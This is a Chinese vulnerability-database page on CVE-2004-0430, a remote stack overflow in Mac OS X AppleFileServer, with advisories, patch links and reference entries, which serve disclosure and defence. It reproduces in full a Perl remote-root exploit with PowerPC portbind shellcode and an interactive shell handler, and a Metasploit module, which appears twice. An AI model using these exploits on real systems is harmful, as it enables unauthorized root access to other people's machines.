CVE-2004-0430
CVSS5.1
发布时间 :2004-07-07 00:00:00
修订时间 :2008-09-05 16:38:25
NMCOEPS    

[原文]Stack-based buffer overflow in AppleFileServer for Mac OS X 10.3.3 and earlier allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field.


[CNNVD]Apple Mac OS X AppleFileServer预验证远程缓冲区溢出漏洞(CNNVD-200407-024)

        
        AppleFileServer是MacOS X系统使用的Apple文件服务程序。
        AppleFileServer在处理包含畸形'PathName'参数的'LoginExt'报文时存在问题,远程攻击者可以利用此漏洞执行缓冲区溢出攻击,可能以进程权限执行任意指令。
        问题存在于预验证阶段,当接收到'PathName'参数的LoginExt'包请求使用明文密码用户验证方式的请求时存在缓冲区溢出。'PathName'参数以一字节指定字符串类型,两字节指定字符串长度,其他为字符串自身来编码,如果字符串类型AFPName (0x3)长过包中指定的长度数据,可导致覆盖堆栈中的缓冲区,精心构建提交数据可能以进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x_server:10.3.3Apple Mac OS X Server 10.3.3
cpe:/o:apple:mac_os_x:10.3.3Apple Mac OS X 10.3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0430
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0430
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-024
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/648406
(UNKNOWN)  CERT-VN  VU#648406
http://xforce.iss.net/xforce/xfdb/16049
(VENDOR_ADVISORY)  XF  applefileserver-afp-pathname-bo(16049)
http://www.atstake.com/research/advisories/2004/a050304-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A050304-1
http://www.securiteam.com/securitynews/5QP0115CUO.html
(UNKNOWN)  MISC  http://www.securiteam.com/securitynews/5QP0115CUO.html
http://securitytracker.com/id?1010039
(UNKNOWN)  SECTRACK  1010039
http://secunia.com/advisories/11539
(UNKNOWN)  SECUNIA  11539
http://lists.apple.com/mhonarc/security-announce/msg00049.html
(UNKNOWN)  APPLE  APPLE-SA-2004-05-03

- 漏洞信息

Apple Mac OS X AppleFileServer预验证远程缓冲区溢出漏洞
中危 边界条件错误
2004-07-07 00:00:00 2005-10-20 00:00:00
远程  
        
        AppleFileServer是MacOS X系统使用的Apple文件服务程序。
        AppleFileServer在处理包含畸形'PathName'参数的'LoginExt'报文时存在问题,远程攻击者可以利用此漏洞执行缓冲区溢出攻击,可能以进程权限执行任意指令。
        问题存在于预验证阶段,当接收到'PathName'参数的LoginExt'包请求使用明文密码用户验证方式的请求时存在缓冲区溢出。'PathName'参数以一字节指定字符串类型,两字节指定字符串长度,其他为字符串自身来编码,如果字符串类型AFPName (0x3)长过包中指定的长度数据,可导致覆盖堆栈中的缓冲区,精心构建提交数据可能以进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Apple
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Apple Mac OS X Server 10.2.8:
        Apple Patch SecUpdSrvr2004-05-03Jag.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1219.20040503.Zsw3S/2Z/SecUpdSrvr2004-05-03Jag.dmg

        Apple Mac OS X 10.2.8:
        Apple Patch SecUpd2004-05-03Jag.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1217.20040503.BmkY5/2Z/SecUpd2004-05-03Jag.dmg

        Apple Mac OS X 10.3.3:
        Apple Patch SecUpd2004-05-03Pan.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1213.20040503.vngr3/2Z/SecUpd2004-05-03Pan.dmg

        Apple Mac OS X Server 10.3.3:
        Apple Patch SecUpdSrvr2004-05-03Pan.dmg
        
        http://download.info.apple.com/Mac_OS_X/061-1215.20040503.mPp9k/2Z/SecUpdSrvr2004-05-03Pan.dmg

- 漏洞信息 (391)

Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit (EDBID:391)
osX remote
2004-08-13 Verified
548 Dino Dai Zovi
N/A [点击下载]
#!/usr/bin/perl
# Priv8security com remote root exploit for AppleFileServer.
# PUBLIC VERSION!!!!
#
# Bug found by Dave G. and Dino Dai Zovi.
# URL: http://www.atstake.com/research/advisories/2004/a050304-1.txt
#
# [wsxz@localhost buffer]$ perl priv8afp.pl -h 10.4.12.199 -t 0
# -=[Priv8security.com Apple File Server remote root exploit!]=-
#
# [+] Using target: MacOSX 10.3.3
# [+] Using ret: 0xf0101cb0
# [+] Sending Request Opensession... DOne!
# [+] Got response packet:
# Flags: 1 Cmd: 4 ID: 31337
# [+] Sending FPloginEXT packet... DOne!
# [+] Waiting... We got in =)
#
# ****** Welcome to 'Adriano-Limas-Computer' ******
#
# Darwin Adriano-Limas-Computer.local 7.3.1 Darwin Kernel Version 7.3.1: Mon Mar
# 22 21:48:41 PST 2004; root:xnu/xnu-517.4.12.obj~2/RELEASE_PPC Power Macintosh powerpc
# uid=0(root) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty),
# 5(operator), 20(staff), 31(guest), 80(admin)
#
####################################################################
use IO::Socket;

use Getopt::Std; getopts('h:t:p:o:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'t'})) { $target = $args{'t'}; }
if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;}
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}


my @targets = (
# description, ret, Magic size.
["MacOSX 10.3.3", 0xf0101cb0, 4], #tested on my ibook g4
);

print STDERR "-=[Priv8security.com Apple File Server remote root exploit!]=-\n\n";

if (!defined($host) || !defined($target)) {
Usage();
}

($desc,$ret,$msize) = @{$targets[$target]};

print STDERR "[+] Using target: $desc\n";
print STDERR "[+] Using ret: 0x" . sprintf('%lx', $ret + $offset) . "\n";

$shellcode = # portbind shellcode by br00t [at] blueyonder.co.uk
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x70".
"\x39\x80\x01\x70\x3b\xdf\xff\x88\x7c\xbe\x29\xae\x3b\xdf\xff\x89".
"\x7c\xbe\x29\xae\x3b\xdf\xff\x8a\x7c\xbe\x29\xae\x3b\xdf\xff\x8b".
"\x7c\xbe\x29\xae\x38\x6c\xfe\x92\x38\x8c\xfe\x91\x38\xac\xfe\x96".
"\x38\x0c\xfe\xf1\x44\xff\xff\x02\x60\x60\x60\x60\x7c\x67\x1b\x78".
"\x38\x9f\xff\x84\x38\xac\xfe\xa0\x38\x0c\xfe\xf8\x44\xff\xff\x02".
"\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x91\x38\x0c\xfe\xfa".
"\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x90".
"\x38\xac\xfe\x90\x38\x0c\xfe\xae\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x8c\xfe\x90\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x8c\xfe\x91\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x8c\xfe\x92\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60".
"\x38\x0c\xfe\x92\x44\xff\xff\x02\x60\x60\x60\x60\x39\x1f\xff\x83".
"\x7c\xa8\x29\xae\x38\x7f\xff\x7c\x90\x61\xff\xf8\x90\xa1\xff\xfc".
"\x38\x81\xff\xf8\x38\x0c\xfe\xcb\x44\xff\xff\x02\x41\x41\x41\x41".
"\x41\x41\x41\x41\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\x02\x1b\x39".
"\x41\x41\x41\x41";

$bin_ret = reverse(pack('l', ($ret + $offset)));

$buffer = "\x60" x 141;
$buffer .= $bin_ret;
$buffer .= "\x60" x (824 - length($shellcode));
$buffer .= $shellcode;
$buffer .= "A" x 100;

$req =
"\x00\x04".# Request Opensession
"\x7a\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

$packet = 
"\x00". # Request
"\x02". # Command
"\x7a\x69".# leet ID
"\x00\x00\x00\x00".# Data Offset
"\x00\x00\x04\x00".# Length
"\x00\x00\x00\x00".# Reserved
"\x3f". # FPloginext
"\x00". # Pad
"\x00\x00". # Flags
"\x0e\x41\x46\x50\x56\x65\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31".# Version
"\x10\x43\x6c\x65\x61\x72\x74\x78\x74\x20\x70\x61\x73\x73\x77\x72\x64". # UAM
"\x03". # Type
"\x00\x07". # User Len
"\x41\x64\x72\x69\x61\x6e\x6f" .# AFPNAME USER
"\x03". # Pathtype
"\x80\xff". # Path Len
$buffer. # Evil String
"\x00"; # Pad

$len = reverse(pack("S", $msize));

substr($packet, 63 , 2, $len);

$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "[-] Cant connect: $!\n\n";

print STDERR "[+] Sending Request Opensession... ";

$f->send($req);
print STDERR "DOne!\n";

$f->recv($crap,128);
if($crap){
print STDERR "[+] Got response packet:\n";
parse_packet($crap);
}

print STDERR "[+] Sending FPloginEXT packet... ";
$f->send($packet);
print STDERR "DOne!\n";
print STDERR "[+] Waiting... ";

sleep(5);

$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>6969,Type=>SOCK_STREAM,Reuse=>1)
or die "No luck :( $!\n\n";

print "We got in =)\n";

$sc->autoflush(1);

sleep(2);

print $sc "echo;echo \"****** Welcome to '`hostname -s`' ******\"\n";
print $sc "echo;uname -a;id;echo\n";

die "cant fork: $!" unless defined($pid = fork());

if ($pid) {
while(defined ($line = <$sc>)) {
print STDOUT $line;
}
kill("TERM", $pid);
}
else
{
while(defined ($line = <STDIN>)) {
print $sc $line;
}
}
close($sc);
print "Good bye!!\n";

sub parse_packet
{
my ($buf) = shift @_;
my (@packet);
my ($i);

for ($i=0;$i<length($buf);$i++)
{
push(@packet, substr($buf, $i, 1));
}

my ($flags) = unpack("C", @packet[0]);
my ($cmd) = unpack("C", @packet[1]);

my ($request_id) = unpack("n", @packet[2] . @packet[3]);
print " Flags: $flags Cmd: $cmd ID: $request_id\n";

}


sub Usage {

print STDERR "Options:
-h Victim ip.
-t Target number from list.
-p Port to attack.
-o Offset, try in steps of 500.\n\n";

print STDERR "Targets:\n";
for($i=0; $i < @targets; $i++){
($dd) = @{$targets[$i]};
print STDERR " $i - $dd\n";
}
print STDERR "\nUsage: perl $0 -h Victim -t target\n\n";
exit;
}

# milw0rm.com [2004-08-13]
		

- 漏洞信息 (16863)

AppleFileServer LoginExt PathName Overflow (EDBID:16863)
osX remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: loginext.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AppleFileServer LoginExt PathName Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the AppleFileServer service
				on MacOS X. This vulnerability was originally reported by Atstake and
				was actually one of the few useful advisories ever published by that
				company. You only have one chance to exploit this bug.
				This particular exploit uses a stack-based return address that will
				only work under optimal conditions.
			},
			'Author'         => 'hdm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2004-0430'],
					[ 'OSVDB', '5762'],
					[ 'BID', '10271'],
				],
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x20",
					'MinNops'  => 128,
					'Compat'   =>
						{
							'ConnectionType' => "+find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Mac OS X 10.3.3',
						{
							'Platform' => 'osx',
							'Arch'     => ARCH_PPC,
							'Ret'      => 0xf0101c0c # stack address :<
						},
					],
				],
			'DisclosureDate' => 'May 3 2004'))

		# Configure the default port to be AFP
		register_options(
			[
				Opt::RPORT(548),
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		path          = "\xff" * 1024
		path[168, 4]  = Rex::Arch.pack_addr(target.arch, target.ret)
		path[172, payload.encoded.length] = payload.encoded

		# The AFP header
		afp = "\x3f\x00\x00\x00"

		# Add the authentication methods
		["AFP3.1", "Cleartxt Passwrd"].each { |m|
			afp << [m.length].pack('C') + m
		}

		# Add the user type and afp path
		afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
		afp << "\x03" + [path.length].pack('n') + path

		# Add the data stream interface header
		dsi =
		[
			0,           # Flags
			2,           # Command
			rand(65536), # XID
			0,           # Data Offset
			afp.length,  # Data Length
			0            # Reserved
		].pack("CCnNNN") + afp

		sock.put(dsi)

		handler

		disconnect
	end

end
		

- 漏洞信息 (F82304)

AppleFileServer LoginExt PathName Overflow (PacketStormID:F82304)
2009-10-28 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2004-0430
[点击下载]

This Metasploit module exploits a stack overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	
	include Msf::Exploit::Remote::Tcp
	
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AppleFileServer LoginExt PathName Overflow',
			'Description'    => %q{
				 This module exploits a stack overflow in the AppleFileServer service
				 on MacOS X. This vulnerability was originally reported by Atstake and
				 was actually one of the few useful advisories ever published by that
				 company. You only have one chance to exploit this bug.
				 This particular exploit uses a stack-based return address that will 
				 only work under optimal conditions.
			},
			'Author'         => 'hdm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2004-0430'],
					[ 'OSVDB', '5762'],
					[ 'BID', '10271'],
				],
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x20",
					'MinNops'  => 128,
					'Compat'   =>
						{
							'ConnectionType' => "+find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Mac OS X 10.3.3',
						{
							'Platform' => 'osx',
							'Arch'     => ARCH_PPC,
							'Ret'      => 0xf0101c0c # stack address :<
						},
					],
				],	
			'DisclosureDate' => 'May 3 2004'))

		# Configure the default port to be AFP
		register_options(
			[
				Opt::RPORT(548),
			], self.class)			
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		path          = "\xff" * 1024
		path[168, 4]  = Rex::Arch.pack_addr(target.arch, target.ret)
		path[172, payload.encoded.length] = payload.encoded
		
		# The AFP header
		afp = "\x3f\x00\x00\x00"
		
		# Add the authentication methods
		["AFP3.1", "Cleartxt Passwrd"].each { |m| 
			afp << [m.length].pack('C') + m
		}
		
		# Add the user type and afp path
		afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
		afp << "\x03" + [path.length].pack('n') + path
		
		# Add the data stream interface header
		dsi = 
		[
			0,           # Flags
			2,           # Command
			rand(65536), # XID
			0,           # Data Offset
			afp.length,  # Data Length
			0            # Reserved
		].pack("CCnNNN") + afp
		
		sock.put(dsi)
		
		handler
		
		disconnect
	end

end


    

- 漏洞信息 (F34035)

priv8afp.pl (PacketStormID:F34035)
2004-08-13 00:00:00
wsxz  priv8security.com
exploit,remote,overflow,root,protocol
apple,osx
CVE-2004-0430
[点击下载]

Remote root exploit for Mac OS X versions 10.3.3, 10.3.2, and 10.2.8 that makes use of the stack buffer overflow in the Apple Filing Protocol (AFP).

- 漏洞信息 (F33249)

Atstake Security Advisory 04-05-03.1 (PacketStormID:F33249)
2004-05-07 00:00:00
David Goldsmith,Atstake,Dino Dai Zovi  atstake.com
advisory,overflow,root,protocol
apple,osx
CVE-2004-0430
[点击下载]

Atstake Security Advisory A050304-1 - The AppleFileServer provides Apple Filing Protocol (AFP) services for both Mac OS X and Mac OS X server. AFP is a protocol used to remotely mount drives, similar to NFS or SMB/CIFS. There is a pre-authentication, remotely exploitable stack buffer overflow that allows an attacker to obtain administrative privileges and execute commands as root. Versions affected are Mac OS X 10.3.3, 10.3.2, and 10.2.8.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                                @stake, Inc.
                              www.atstake.com

                             Security Advisory

Advisory Name: AppleFileServer Remote Command Execution
 Release Date: 05/03/2004
  Application: AppleFileServer
     Platform: MacOS X 10.3.3 and below
     Severity: A remote attacker can execute arbitrary
               commands as root
      Authors: Dave G. <daveg@atstake.com>
               Dino Dai Zovi <ddaizovi@atstake.com>
Vendor Status: Informed, Upgrade Available
CVE Candidate: CAN-2004-0430
    Reference: www.atstake.com/research/advisories/2004/a050304-1.txt


Overview:

The AppleFileServer provides Apple Filing Protocol (AFP) services for
both Mac OS X and Mac OS X server.  AFP is a protocol used to
remotely mount drives, similar to NFS or SMB/CIFS.  There is a
pre-authentication, remotely exploitable stack buffer overflow that
allows an attacker to obtain administrative privileges and execute
commands as root. 


Details:

The AppleFileServer provides Apple Filing Protocol (AFP) services
for both Mac OS X and Mac OS X server.  AFP is a protocol used to
remotely mount drives, similar to NFS or SMB/CIFS.  AFP is not
enabled by default. It is enabled through the Sharing Preferences
section by selecting the 'Personal File Sharing' checkbox. 

Thereis a pre-authentication remotely exploitable stack buffer
overflow that allows an attacker to obtain administrative
privileges. The overflow occurs when parsing the PathName argument
from LoginExt packet requesting authentication using the Cleartext
Password User Authentication Method (UAM).  The PathName argument
is encoded as one-byte specifying the string type, two-bytes
specifying the string length, and finally the string itself.  A
string of type AFPName (0x3) that is longer than the length declared
in the packet will overflow the fixed-size stack buffer.

The previously described malformed request results in a trivially
exploitable stack buffer overflow.  @stake was able to quickly
develop a proof-of-concept exploit that portably demonstrates this
vulnerability across multiple Mac OS X versions including Mac OS X
10.3.3, 10.3.2, and 10.2.8.


Vendor Response:

- From APPLE-SA-2004-05-03 Security Update 2004-05-03

AppleFileServer: Fixes CAN-2004-0430 to improve the handling of long
passwords. Credit to Dave G. from @stake for reporting this issue.

Security Update 2004-05-03 may be obtained from:

  * Software Update pane in System Preferences

  * Apple's Software Downloads web site:

    For Mac OS X 10.3.3 "Panther"
    =============================
    http://download.info.apple.com/Mac_OS_X/061-1213.20040503.vngr3/
2Z/SecUpd2004-05-03Pan.dmg
    The download file is named: "SecUpd2004-05-03Pan.dmg"
    Its SHA-1 digest is: 6f35539668d80ee536305a4146bd982a93706532
   
    For Mac OS X Server 10.3.3
    ==========================
    http://download.info.apple.com/Mac_OS_X/061-1215.20040503.mPp9k/
2Z/SecUpdSrvr2004-05-03Pan.dmg
    The download file is named: "SecUpdSrvr2004-05-03Pan.dmg"
    Its SHA-1 digest is: 3c7da910601fd36d4cdfb276af4783ae311ac5d7
   
    For Mac OS X 10.2.8 "Jaguar"
    =============================
    http://download.info.apple.com/Mac_OS_X/061-1217.20040503.BmkY5/
2Z/SecUpd2004-05-03Jag.dmg
    The download file is named: "SecUpd2004-05-03Jag.dmg"
    Its SHA-1 digest is: 11d5f365e0db58b369d85aa909ac6209e2f49945
   
    For Mac OS X Server 10.2.8
    ==========================
    http://download.info.apple.com/Mac_OS_X/061-1219.20040503.Zsw3S/
2Z/SecUpdSrvr2004-05-03Jag.dmg
    The download file is named: "SecUpdSrvr2004-05-03Jag.dmg"
    Its SHA-1 digest is: 28859a4c88f6e1d1fe253388b233a5732b6e42fb


Timeline

3/26/2004 Vendor notified of issue
5/04/2004 Vendor informs us that they have a patch available
4/04/2004 Advisory released


Recommendation:

If you do not need AFS, disable it.  If you do need it, upgrade to
the latest version of Panther. 


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2004-0430  AppleFileServer Remote Command Execution


Open Source Vulnerability Database (OSVDB) Information:
More information available at www.osvdb.org

  OSVDB ID 5762


@stake Vulnerability Reporting Policy:
http://www.atstake.com/research/policy/

@stake Advisory Archive:
http://www.atstake.com/research/advisories/

PGP Key:
http://www.atstake.com/research/pgp_key.asc

Copyright 2004 @stake, Inc. All rights reserved.






-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.3

iQA/AwUBQJbHKUe9kNIfAm4yEQJraQCgvzJSUEBfxJNS5Yrk8tCFoM+7vCsAn0WI
aBZDr4XgtWYb05rrBQKn01f2
=A6ex
-----END PGP SIGNATURE-----
    

- 漏洞信息

5762
Apple Mac OS X AppleFileServer Pre-Authentication Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

MacOS X contains a flaw that may allow a remote attacker to gain administrative privileges. The issue is due to a stack buffer overflow in the pre-authentication routine. The overflow occurs when the PathName argument from the LoginExt packet requests authentication using the Cleartext Password User Authentication Method (UAM). With a specially crafted request, an attacker can gain full administrative privilege over the machine remotely.

- 时间线

2004-05-03 2004-03-26
2004-08-15 Unknow

- 解决方案

Apple has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable AFS if not essential. For Mac OS X 10.3.3 "Panther" ============================= http://download.info.apple.com/Mac_OS_X/061-1213.20040503.vngr3/2Z/SecUpd2004-05-03Pan.dmg For Mac OS X Server 10.3.3 ========================== http://download.info.apple.com/Mac_OS_X/061-1215.20040503.mPp9k/2Z/SecUpdSrvr2004-05-03Pan.dmg For Mac OS X 10.2.8 "Jaguar" ============================= http://download.info.apple.com/Mac_OS_X/061-1217.20040503.BmkY5/2Z/SecUpd2004-05-03Jag.dmg For Mac OS X Server 10.2.8 ========================== http://download.info.apple.com/Mac_OS_X/061-1219.20040503.Zsw3S/2Z/SecUpdSrvr2004-05-03Jag.dmg

- 相关参考

- 漏洞作者

- 漏洞信息

Apple Mac OS X AppleFileServer Remote Buffer Overflow Vulnerability
Boundary Condition Error 10271
Yes No
2004-05-03 12:00:00 2009-07-12 04:07:00
Discovery is credited to @stake, Inc. <www.atstake.com>.

- 受影响的程序版本

Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X Server 10.2.8
Apple Mac OS X Server 10.2.7
Apple Mac OS X Server 10.2.6
Apple Mac OS X Server 10.2.5
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3
Apple Mac OS X 10.2.8
Apple Mac OS X 10.2.7
Apple Mac OS X 10.2.6
Apple Mac OS X 10.2.5
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2

- 漏洞讨论

It has been reported that AppleFileServer is prone to a remote buffer overflow vulnerability that may allow a remote attacker to execute arbitrary code in order to gain unauthorized access. The issue presents itself when the application receives a 'LoginExt' packet containing a malformed 'PathName' argument.

Apple Mac OS X 10.3.3 and prior are reported to be prone to this issue.

This issue was previously disclosed in a multiple BID 10268 (Apple OS X Multiple Unspecified Large Input Vulnerabilities), however, it is being assigned a new BID as a result of new information available.

- 漏洞利用

An Exploit has been released for this issue as part of the Metasploit Framework project version 2.2. Various other exploits have been released as well. Please see the Metasploit exploits site in Web references for more information.

An additional exploit (priv8afp.pl) has been released.

- 解决方案

Apple has released security advisory APPLE-SA-2004-05-03 dealing with this and other issues. Please see the referenced advisory for more information.


Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X Server 10.3.3

Apple Mac OS X 10.3.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站